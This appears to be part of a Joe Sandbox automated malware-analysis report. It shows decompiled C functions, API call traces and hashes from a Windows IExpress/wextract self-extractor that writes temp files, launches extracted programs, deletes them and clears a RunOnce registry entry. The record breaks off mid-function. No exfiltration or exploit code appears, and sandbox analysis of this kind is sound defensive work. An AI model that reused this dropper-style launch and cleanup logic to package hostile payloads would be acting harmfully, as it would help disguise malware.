                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                        • String ID:
                                                                        • API String ID: 836923961-0
                                                                        • Opcode ID: c1a994f87e7c1a1427cc4e48b9cf580d1dec9f56957ef8da1574bbf1186292f1
                                                                        • Instruction ID: 46546831d4c8cef33a28ba882718b2b2008e84eaeb7e2adfc231b729367f3129
                                                                        • Opcode Fuzzy Hash: c1a994f87e7c1a1427cc4e48b9cf580d1dec9f56957ef8da1574bbf1186292f1
                                                                        • Instruction Fuzzy Hash: 6141C0319447288BEB21BB649C497FA77A4FB84775F64012AE841E7290CF788842BB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 587 f858c8-f858d5 588 f858d8-f858dd 587->588 588->588 589 f858df-f858f1 LocalAlloc 588->589 590 f85919-f85959 call f81680 call f8658a CreateFileA LocalFree 589->590 591 f858f3-f85901 call f844b9 589->591 594 f85906-f85910 call f86285 590->594 600 f8595b-f8596c CloseHandle GetFileAttributesA 590->600 591->594 601 f85912-f85918 594->601 600->594 602 f8596e-f85970 600->602 602->594 603 f85972-f8597b 602->603 603->601
                                                                        C-Code - Quality: 95%
                                                                        			E00F858C8(intOrPtr* __ecx) {
                                                                        				void* _v8;
                                                                        				intOrPtr _t6;
                                                                        				void* _t10;
                                                                        				void* _t12;
                                                                        				void* _t14;
                                                                        				signed char _t16;
                                                                        				void* _t20;
                                                                        				void* _t23;
                                                                        				intOrPtr* _t27;
                                                                        				CHAR* _t33;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_t33 = __ecx;
                                                                        				_t27 = __ecx;
                                                                        				_t23 = __ecx + 1;
                                                                        				do {
                                                                        					_t6 =  *_t27;
                                                                        					_t27 = _t27 + 1;
                                                                        				} while (_t6 != 0);
                                                                        				_t36 = _t27 - _t23 + 0x14;
                                                                        				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                        				if(_t20 != 0) {
                                                                        					E00F81680(_t20, _t36, _t33);
                                                                        					E00F8658A(_t20, _t36, "TMP4351$.TMP");
                                                                        					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                        					_v8 = _t10;
                                                                        					LocalFree(_t20);
                                                                        					_t12 = _v8;
                                                                        					if(_t12 == 0xffffffff) {
                                                                        						goto L4;
                                                                        					} else {
                                                                        						CloseHandle(_t12);
                                                                        						_t16 = GetFileAttributesA(_t33); // executed
                                                                        						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                        							goto L4;
                                                                        						} else {
                                                                        							 *0xf89124 = 0;
                                                                        							_t14 = 1;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					E00F844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        					L4:
                                                                        					 *0xf89124 = E00F86285();
                                                                        					_t14 = 0;
                                                                        				}
                                                                        				return _t14;
                                                                        			}













                                                                        0x00f858cd
                                                                        0x00f858d1
                                                                        0x00f858d3
                                                                        0x00f858d5
                                                                        0x00f858d8
                                                                        0x00f858d8
                                                                        0x00f858da
                                                                        0x00f858db
                                                                        0x00f858e1
                                                                        0x00f858ed
                                                                        0x00f858f1
                                                                        0x00f8591e
                                                                        0x00f8592c
                                                                        0x00f85943
                                                                        0x00f8594a
                                                                        0x00f8594d
                                                                        0x00f85953
                                                                        0x00f85959
                                                                        0x00000000
                                                                        0x00f8595b
                                                                        0x00f8595c
                                                                        0x00f85963
                                                                        0x00f8596c
                                                                        0x00000000
                                                                        0x00f85972
                                                                        0x00f85974
                                                                        0x00f8597a
                                                                        0x00f8597a
                                                                        0x00f8596c
                                                                        0x00f858f3
                                                                        0x00f85901
                                                                        0x00f85906
                                                                        0x00f8590b
                                                                        0x00f85910
                                                                        0x00f85910
                                                                        0x00f85918

                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00F85534,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F858E7
                                                                        • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00F85534,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F85943
                                                                        • LocalFree.KERNEL32(00000000,?,00F85534,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8594D
                                                                        • CloseHandle.KERNEL32(00000000,?,00F85534,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8595C
                                                                        • GetFileAttributesA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00F85534,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F85963
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                                                                        • API String ID: 747627703-908790857
                                                                        • Opcode ID: 890e09afecfe78b68075f32006557d0b0a2e9def032f2f2e1a2faf55e33f3324
                                                                        • Instruction ID: 51b37ddd8d63077803ca8cf1a18652c6ccbfc02d8de643a8a774e3ff36a2d210
                                                                        • Opcode Fuzzy Hash: 890e09afecfe78b68075f32006557d0b0a2e9def032f2f2e1a2faf55e33f3324
                                                                        • Instruction Fuzzy Hash: 1E113831B0061467DB207FB95C4DBEB7E9DEF45770B100616F505D31D1DA74D806A7A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 631 f83fef-f84010 632 f8410a-f8411a call f86ce0 631->632 633 f84016-f8403b CreateProcessA 631->633 635 f84041-f8406e WaitForSingleObject GetExitCodeProcess 633->635 636 f840c4-f84101 call f86285 GetLastError FormatMessageA call f844b9 633->636 637 f84070-f84077 635->637 638 f84091 call f8411b 635->638 650 f84106 636->650 637->638 641 f84079-f8407b 637->641 645 f84096-f840b8 CloseHandle * 2 638->645 641->638 644 f8407d-f84089 641->644 644->638 647 f8408b 644->647 648 f84108 645->648 649 f840ba-f840c0 645->649 647->638 648->632 649->648 651 f840c2 649->651 650->648 651->650
                                                                        C-Code - Quality: 84%
                                                                        			E00F83FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v524;
                                                                        				long _v528;
                                                                        				struct _PROCESS_INFORMATION _v544;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t20;
                                                                        				void* _t22;
                                                                        				int _t25;
                                                                        				intOrPtr* _t39;
                                                                        				signed int _t44;
                                                                        				void* _t49;
                                                                        				signed int _t50;
                                                                        				intOrPtr _t53;
                                                                        
                                                                        				_t45 = __edx;
                                                                        				_t20 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t20 ^ _t50;
                                                                        				_t39 = __ecx;
                                                                        				_t49 = 1;
                                                                        				_t22 = 0;
                                                                        				if(__ecx == 0) {
                                                                        					L13:
                                                                        					return E00F86CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                        				}
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                        				if(_t25 == 0) {
                                                                        					 *0xf89124 = E00F86285();
                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                                        					_t45 = 0x4c4;
                                                                        					E00F844B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                                        					L11:
                                                                        					_t49 = 0;
                                                                        					L12:
                                                                        					_t22 = _t49;
                                                                        					goto L13;
                                                                        				}
                                                                        				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                        				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                        				_t44 = _v528;
                                                                        				_t53 =  *0xf88a28; // 0x0
                                                                        				if(_t53 == 0) {
                                                                        					_t34 =  *0xf89a2c; // 0x0
                                                                        					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                        						_t34 = _t44 & 0xff000000;
                                                                        						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                        							 *0xf89a2c = _t44;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				E00F8411B(_t34, _t44);
                                                                        				CloseHandle(_v544.hThread);
                                                                        				CloseHandle(_v544);
                                                                        				if(( *0xf89a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                        					goto L12;
                                                                        				} else {
                                                                        					goto L11;
                                                                        				}
                                                                        			}


















                                                                        0x00f83fef
                                                                        0x00f83ffa
                                                                        0x00f84001
                                                                        0x00f84008
                                                                        0x00f8400a
                                                                        0x00f8400b
                                                                        0x00f84010
                                                                        0x00f8410a
                                                                        0x00f8411a
                                                                        0x00f8411a
                                                                        0x00f8401c
                                                                        0x00f8401d
                                                                        0x00f8401e
                                                                        0x00f8401f
                                                                        0x00f84033
                                                                        0x00f8403b
                                                                        0x00f840ca
                                                                        0x00f840e9
                                                                        0x00f840f8
                                                                        0x00f84101
                                                                        0x00f84106
                                                                        0x00f84106
                                                                        0x00f84108
                                                                        0x00f84108
                                                                        0x00000000
                                                                        0x00f84108
                                                                        0x00f84049
                                                                        0x00f8405c
                                                                        0x00f84062
                                                                        0x00f84068
                                                                        0x00f8406e
                                                                        0x00f84070
                                                                        0x00f84077
                                                                        0x00f8407f
                                                                        0x00f84089
                                                                        0x00f8408b
                                                                        0x00f8408b
                                                                        0x00f84089
                                                                        0x00f84077
                                                                        0x00f84091
                                                                        0x00f8409c
                                                                        0x00f840a8
                                                                        0x00f840b8
                                                                        0x00000000
                                                                        0x00f840c2
                                                                        0x00000000
                                                                        0x00f840c2

                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00F84033
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F84049
                                                                        • GetExitCodeProcess.KERNELBASE ref: 00F8405C
                                                                        • CloseHandle.KERNEL32(?), ref: 00F8409C
                                                                        • CloseHandle.KERNEL32(?), ref: 00F840A8
                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00F840DC
                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00F840E9
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                        • String ID:
                                                                        • API String ID: 3183975587-0
                                                                        • Opcode ID: cdcebd515a4a9028288cdbcd648a4c7148802f9973102e15d75e420f1072a7e1
                                                                        • Instruction ID: 199093de1051b3df53d0adc137158c5def39e71106483e3b0d0d6270f1add08a
                                                                        • Opcode Fuzzy Hash: cdcebd515a4a9028288cdbcd648a4c7148802f9973102e15d75e420f1072a7e1
                                                                        • Instruction Fuzzy Hash: A831AE31A4061CABEB21AB65DC4DFFB777CEB94711F1001AAFA05E21A1CA345D85EF21
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 652 f851e5-f8520b call f8468f LocalAlloc 655 f8522d-f8523c call f8468f 652->655 656 f8520d-f85228 call f844b9 call f86285 652->656 662 f8523e-f85260 call f844b9 LocalFree 655->662 663 f85262-f85270 lstrcmpA 655->663 668 f852b0 656->668 662->668 666 f8527e-f8529c call f844b9 LocalFree 663->666 667 f85272-f85273 LocalFree 663->667 674 f8529e-f852a4 666->674 675 f852a6 666->675 670 f85279-f8527c 667->670 673 f852b2-f852b5 668->673 670->673 674->670 675->668
                                                                        C-Code - Quality: 100%
                                                                        			E00F851E5(void* __eflags) {
                                                                        				int _t5;
                                                                        				void* _t6;
                                                                        				void* _t28;
                                                                        
                                                                        				_t1 = E00F8468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                        				_t28 = LocalAlloc(0x40, _t1);
                                                                        				if(_t28 != 0) {
                                                                        					if(E00F8468F("UPROMPT", _t28, _t29) != 0) {
                                                                        						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                        						if(_t5 != 0) {
                                                                        							_t6 = E00F844B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                        							LocalFree(_t28);
                                                                        							if(_t6 != 6) {
                                                                        								 *0xf89124 = 0x800704c7;
                                                                        								L10:
                                                                        								return 0;
                                                                        							}
                                                                        							 *0xf89124 = 0;
                                                                        							L6:
                                                                        							return 1;
                                                                        						}
                                                                        						LocalFree(_t28);
                                                                        						goto L6;
                                                                        					}
                                                                        					E00F844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        					LocalFree(_t28);
                                                                        					 *0xf89124 = 0x80070714;
                                                                        					goto L10;
                                                                        				}
                                                                        				E00F844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        				 *0xf89124 = E00F86285();
                                                                        				goto L10;
                                                                        			}






                                                                        0x00f851fb
                                                                        0x00f85207
                                                                        0x00f8520b
                                                                        0x00f8523c
                                                                        0x00f85268
                                                                        0x00f85270
                                                                        0x00f8528b
                                                                        0x00f85293
                                                                        0x00f8529c
                                                                        0x00f852a6
                                                                        0x00f852b0
                                                                        0x00000000
                                                                        0x00f852b0
                                                                        0x00f8529e
                                                                        0x00f85279
                                                                        0x00000000
                                                                        0x00f8527b
                                                                        0x00f85273
                                                                        0x00000000
                                                                        0x00f85273
                                                                        0x00f8524a
                                                                        0x00f85250
                                                                        0x00f85256
                                                                        0x00000000
                                                                        0x00f85256
                                                                        0x00f85219
                                                                        0x00f85223
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                          • Part of subcall function 00F8468F: SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                          • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                          • Part of subcall function 00F8468F: LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                          • Part of subcall function 00F8468F: LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                          • Part of subcall function 00F8468F: memcpy_s.MSVCRT ref: 00F846E5
                                                                          • Part of subcall function 00F8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00F82F4D,?,00000002,00000000), ref: 00F85201
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00F85250
                                                                          • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                          • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00F84554
                                                                          • Part of subcall function 00F86285: GetLastError.KERNEL32(00F85BBC), ref: 00F86285
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                        • String ID: <None>$UPROMPT
                                                                        • API String ID: 957408736-2980973527
                                                                        • Opcode ID: 92c475a7174f68f1b73238ce3965e552744e114811dd947469d68241c9a0b298
                                                                        • Instruction ID: 80fe45499ac5be4e62e27504f42fdaa6b792f037b3edd6d83b8da152c9a7424e
                                                                        • Opcode Fuzzy Hash: 92c475a7174f68f1b73238ce3965e552744e114811dd947469d68241c9a0b298
                                                                        • Instruction Fuzzy Hash: 9B110872704605ABE714BBB15C8AFFB719DEB89B50B104429FA02D5190EEBC9C017325
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 74%
                                                                        			E00F852B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				signed int _t9;
                                                                        				signed int _t11;
                                                                        				void* _t21;
                                                                        				void* _t29;
                                                                        				CHAR** _t31;
                                                                        				void* _t32;
                                                                        				signed int _t33;
                                                                        
                                                                        				_t28 = __edi;
                                                                        				_t22 = __ecx;
                                                                        				_t21 = __ebx;
                                                                        				_t9 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t9 ^ _t33;
                                                                        				_push(__esi);
                                                                        				_t31 =  *0xf891e0; // 0x33d7bf0
                                                                        				if(_t31 != 0) {
                                                                        					_push(__edi);
                                                                        					do {
                                                                        						_t29 = _t31;
                                                                        						if( *0xf88a24 == 0 &&  *0xf89a30 == 0) {
                                                                        							SetFileAttributesA( *_t31, 0x80); // executed
                                                                        							DeleteFileA( *_t31); // executed
                                                                        						}
                                                                        						_t31 = _t31[1];
                                                                        						LocalFree( *_t29);
                                                                        						LocalFree(_t29);
                                                                        					} while (_t31 != 0);
                                                                        					_pop(_t28);
                                                                        				}
                                                                        				_t11 =  *0xf88a20; // 0x0
                                                                        				_pop(_t32);
                                                                        				if(_t11 != 0 &&  *0xf88a24 == 0 &&  *0xf89a30 == 0) {
                                                                        					_push(_t22);
                                                                        					E00F81781( &_v268, 0x104, _t22, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\");
                                                                        					if(( *0xf89a34 & 0x00000020) != 0) {
                                                                        						E00F865E8( &_v268);
                                                                        					}
                                                                        					SetCurrentDirectoryA(".."); // executed
                                                                        					_t22 =  &_v268;
                                                                        					E00F82390( &_v268);
                                                                        					_t11 =  *0xf88a20; // 0x0
                                                                        				}
                                                                        				if( *0xf89a40 != 1 && _t11 != 0) {
                                                                        					_t11 = E00F81FE1(_t22); // executed
                                                                        				}
                                                                        				 *0xf88a20 =  *0xf88a20 & 0x00000000;
                                                                        				return E00F86CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                        			}












                                                                        0x00f852b6
                                                                        0x00f852b6
                                                                        0x00f852b6
                                                                        0x00f852c1
                                                                        0x00f852c8
                                                                        0x00f852cb
                                                                        0x00f852cc
                                                                        0x00f852d4
                                                                        0x00f852d6
                                                                        0x00f852d7
                                                                        0x00f852de
                                                                        0x00f852e0
                                                                        0x00f852f2
                                                                        0x00f852fa
                                                                        0x00f852fa
                                                                        0x00f85302
                                                                        0x00f85305
                                                                        0x00f8530c
                                                                        0x00f85312
                                                                        0x00f85316
                                                                        0x00f85316
                                                                        0x00f85317
                                                                        0x00f8531c
                                                                        0x00f8531f
                                                                        0x00f85333
                                                                        0x00f85345
                                                                        0x00f85351
                                                                        0x00f85359
                                                                        0x00f85359
                                                                        0x00f85363
                                                                        0x00f85369
                                                                        0x00f8536f
                                                                        0x00f85374
                                                                        0x00f85374
                                                                        0x00f85381
                                                                        0x00f85387
                                                                        0x00f85387
                                                                        0x00f8538f
                                                                        0x00f853a0

                                                                        APIs
                                                                        • SetFileAttributesA.KERNELBASE(033D7BF0,00000080,?,00000000), ref: 00F852F2
                                                                        • DeleteFileA.KERNELBASE(033D7BF0), ref: 00F852FA
                                                                        • LocalFree.KERNEL32(033D7BF0,?,00000000), ref: 00F85305
                                                                        • LocalFree.KERNEL32(033D7BF0), ref: 00F8530C
                                                                        • SetCurrentDirectoryA.KERNELBASE(00F811FC,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\), ref: 00F85363
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\, xrefs: 00F85334
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\
                                                                        • API String ID: 2833751637-3217841213
                                                                        • Opcode ID: ed04843a71145ed09d10b8c624170e7a0aa507e00999466ea6cdb6ac464d375d
                                                                        • Instruction ID: 5cf1658226ae399e93f2bd067b06c2e7b0e05c178f42a7f61b76b7869c505087
                                                                        • Opcode Fuzzy Hash: ed04843a71145ed09d10b8c624170e7a0aa507e00999466ea6cdb6ac464d375d
                                                                        • Instruction Fuzzy Hash: DC21A13191460CDBDB24BB20DD49BF977A5FB00BA0F48015AE442561A0CFF99C85FB41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F81FE1(void* __ecx) {
                                                                        				void* _v8;
                                                                        				long _t4;
                                                                        
                                                                        				if( *0xf88530 != 0) {
                                                                        					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                        					if(_t4 == 0) {
                                                                        						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
                                                                        						return RegCloseKey(_v8);
                                                                        					}
                                                                        				}
                                                                        				return _t4;
                                                                        			}





                                                                        0x00f81fee
                                                                        0x00f82005
                                                                        0x00f8200d
                                                                        0x00f82017
                                                                        0x00000000
                                                                        0x00f82020
                                                                        0x00f8200d
                                                                        0x00f82029

                                                                        APIs
                                                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00F8538C,?,?,00F8538C), ref: 00F82005
                                                                        • RegDeleteValueA.KERNELBASE(00F8538C,wextract_cleanup1,?,?,00F8538C), ref: 00F82017
                                                                        • RegCloseKey.ADVAPI32(00F8538C,?,?,00F8538C), ref: 00F82020
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: CloseDeleteOpenValue
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
                                                                        • API String ID: 849931509-1592051331
                                                                        • Opcode ID: 0984bc286fffa5744f7921f407c6bfc5cd6719f4b6e973a4e2dada2489fb5746
                                                                        • Instruction ID: f247c37aea4066049c6a219f724ffa978d5a80acc01609ef5bb0f439f9151939
                                                                        • Opcode Fuzzy Hash: 0984bc286fffa5744f7921f407c6bfc5cd6719f4b6e973a4e2dada2489fb5746
                                                                        • Instruction Fuzzy Hash: 83E04F3095031CBBEB22ABD0EC0AFE97B69E701791F640195B904A4060EB61AA14F706
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00F84CD0(char* __edx, long _a4, int _a8) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t29;
                                                                        				int _t30;
                                                                        				long _t32;
                                                                        				signed int _t33;
                                                                        				long _t35;
                                                                        				long _t36;
                                                                        				struct HWND__* _t37;
                                                                        				long _t38;
                                                                        				long _t39;
                                                                        				long _t41;
                                                                        				long _t44;
                                                                        				long _t45;
                                                                        				long _t46;
                                                                        				signed int _t50;
                                                                        				long _t51;
                                                                        				char* _t58;
                                                                        				long _t59;
                                                                        				char* _t63;
                                                                        				long _t64;
                                                                        				CHAR* _t71;
                                                                        				CHAR* _t74;
                                                                        				int _t75;
                                                                        				signed int _t76;
                                                                        
                                                                        				_t69 = __edx;
                                                                        				_t29 =  *0xf88004; // 0x7e92e7a6
                                                                        				_t30 = _t29 ^ _t76;
                                                                        				_v8 = _t30;
                                                                        				_t75 = _a8;
                                                                        				if( *0xf891d8 == 0) {
                                                                        					_t32 = _a4;
                                                                        					__eflags = _t32;
                                                                        					if(_t32 == 0) {
                                                                        						_t33 = E00F84E99(_t75);
                                                                        						L35:
                                                                        						return E00F86CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                        					}
                                                                        					_t35 = _t32 - 1;
                                                                        					__eflags = _t35;
                                                                        					if(_t35 == 0) {
                                                                        						L9:
                                                                        						_t33 = 0;
                                                                        						goto L35;
                                                                        					}
                                                                        					_t36 = _t35 - 1;
                                                                        					__eflags = _t36;
                                                                        					if(_t36 == 0) {
                                                                        						_t37 =  *0xf88584; // 0x0
                                                                        						__eflags = _t37;
                                                                        						if(_t37 != 0) {
                                                                        							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                        						}
                                                                        						_t54 = 0xf891e4;
                                                                        						_t58 = 0xf891e4;
                                                                        						do {
                                                                        							_t38 =  *_t58;
                                                                        							_t58 =  &(_t58[1]);
                                                                        							__eflags = _t38;
                                                                        						} while (_t38 != 0);
                                                                        						_t59 = _t58 - 0xf891e5;
                                                                        						__eflags = _t59;
                                                                        						_t71 =  *(_t75 + 4);
                                                                        						_t73 =  &(_t71[1]);
                                                                        						do {
                                                                        							_t39 =  *_t71;
                                                                        							_t71 =  &(_t71[1]);
                                                                        							__eflags = _t39;
                                                                        						} while (_t39 != 0);
                                                                        						_t69 = _t71 - _t73;
                                                                        						_t30 = _t59 + 1 + _t71 - _t73;
                                                                        						__eflags = _t30 - 0x104;
                                                                        						if(_t30 >= 0x104) {
                                                                        							L3:
